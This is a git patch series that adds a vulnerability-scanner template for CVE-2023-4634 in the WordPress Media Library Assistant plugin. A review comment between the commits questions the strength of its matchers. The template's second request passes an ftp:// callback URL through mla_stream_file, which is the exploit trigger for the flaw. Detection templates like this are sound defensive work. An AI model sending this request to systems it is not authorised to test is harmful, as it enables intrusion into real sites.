From 7534ad59ac5b0a85322338885765c030f892a1e9 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 5 Sep 2023 19:00:09 +0530
Subject: [PATCH 1/3] Create CVE-2023-4634.yaml
---
 http/cves/2023/CVE-2023-4634.yaml | 37 +++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-4634.yaml
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml
new file mode 100644
index 0000000000..3694a6c7e6
--- /dev/null
+++ b/http/cves/2023/CVE-2023-4634.yaml
@@ -0,0 +1,37 @@
+id: CVE-2023-4634
+
+info:
+ name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
+ author: Pepitoh,ritikchaddha
+ severity: critical
+ description: |
+ A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
+ remediation: Fixed in version 3.09
+ reference:
+ - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
+ - https://cve.report/CVE-2023-4634
+ classification:
+ cve-id: CVE-2023-4634
+ metadata:
+ max-request: 1
+ verified: true
+ publicwww-query: "wp-content/plugins/media-library-assistant"
+ tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt"
+ - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body_1
+ words:
+ - "Media Library Assistant"
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
From fc0dcf0ea7926c237c0668cc0b80d426f8f1dd7b Mon Sep 17 00:00:00 2001
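Review bot: The two matchers in the new `http` block establish less than the `critical` severity suggests: the `body_1` word match on `Media Library Assistant` shows only that the plugin's readme.txt is served, not that the installed version is below 3.09, and the `interactsh_protocol` match on `dns` shows only that some resolver looked up the callback name. A DNS-only interaction can come from a WAF, proxy or log pipeline that resolves hostnames seen in URLs, so a patched or shielded site could still be reported. Consider also extracting the `Stable tag` value from readme.txt and comparing it with 3.09, and stating the limitation next to the matcher, e.g. `# dns interaction = callback name was resolved; does not prove the file was fetched or processed`. The description text also reads "which leading to RCE" and "Imagegick"; presumably "which leads to RCE" and Imagick/ImageMagick were meant.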
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 5 Sep 2023 19:02:19 +0530
Subject: [PATCH 2/3] update metadata & ref
---
 http/cves/2023/CVE-2023-4634.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml
index 3694a6c7e6..c45ff1abfa 100644
--- a/http/cves/2023/CVE-2023-4634.yaml
+++ b/http/cves/2023/CVE-2023-4634.yaml
@@ -9,14 +9,15 @@ info:
 remediation: Fixed in version 3.09
 reference:
 - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
+ - https://fr.wordpress.org/plugins/media-library-assistant/advanced/
 - https://cve.report/CVE-2023-4634
 classification:
 cve-id: CVE-2023-4634
 metadata:
- max-request: 1
+ max-request: 2
 verified: true
 publicwww-query: "wp-content/plugins/media-library-assistant"
- tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce
+ tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant

 http:
 - method: GET
From 09275ac9978b63f53f7646cbb5a6cd831b468ceb Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 5 Sep 2023 19:03:32 +0530
Subject: [PATCH 3/3] lint fix
---
 http/cves/2023/CVE-2023-4634.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml
index c45ff1abfa..59eb930a09 100644
--- a/http/cves/2023/CVE-2023-4634.yaml
+++ b/http/cves/2023/CVE-2023-4634.yaml
@@ -5,7 +5,7 @@ info:
 author: Pepitoh,ritikchaddha
 severity: critical
 description: |
- A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
+ A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.
 remediation: Fixed in version 3.09
 reference:
 - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/